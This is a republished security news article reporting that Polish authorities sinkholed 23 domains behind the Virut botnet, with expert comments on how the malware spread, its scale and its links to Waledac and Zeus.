Virut botnet takedown sinkholes 23 domains

By

Polish cyber security experts seized domains.

Polish cyber security experts seized domains behind the Virut botnet over the weekend.

Virut botnet takedown sinkholes 23 domains

Control of the 23 .pl domains was mastered by Polish registrar Nask, with the Polish computer emergency readiness team (CERT) assuming control of redirected traffic from the domains.

“Since 2006, Virut has been one of the most disturbing threats active on the internet," Cert Polska said.

"Interestingly, Virut's main distribution vector is executable file infection, and most users would get infected by using removable media or sharing files over networks. However, more recent versions of the malware have been capable of infecting HTML files, injecting an invisible iFrame that would download Virut from a remote site.

Infected computers would connect to an IRC server controlled by the attacker and receive instructions to download and run arbitrary executable files without owner's knowledge.

Symantec's threat report said that Virut controlled 300,000 machines, while Kaspersky Lab said that Virut was responsible for 5.5 per cent of malware infections in the third quarter of 2012.

Symantec security response Denis Carmody said that Virut was downloading variants of the Waledac worm onto compromised PCs adding the number of computers infected with W32.Waledac.D continues to increase.

Cert Polska said that among the sinkholed 23 domain names were two websites that were broadly associated not just with Virut but also with the Zeus Trojan.

Paul Ducklin, head of technology for Sophos Asia Pacific, said: “So taking over some or all of those servers can make a big difference, at least temporarily, to the crooks' ability to operate their botnets.

“Every infected PC that crooks can no longer send on a criminal mission represents lost opportunity and lost revenue, and that hits them where it hurts: the pocket.”

This article originally appeared at scmagazineuk.com

Got a news tip for our journalists? Share it with us anonymously here.
Copyright © SC Magazine, UK edition
Tags:

Most Read Articles

Australia's super funds told to assess authentication controls

Australia's super funds told to assess authentication controls

Woolworths' CSO is Optus-bound

Woolworths' CSO is Optus-bound

CBA looks to GenAI to assist 1200 'security champions'

CBA looks to GenAI to assist 1200 'security champions'

Hackers abuse modified Salesforce app to steal data, extort companies

Hackers abuse modified Salesforce app to steal data, extort companies

Log In

  |  Forgot your password?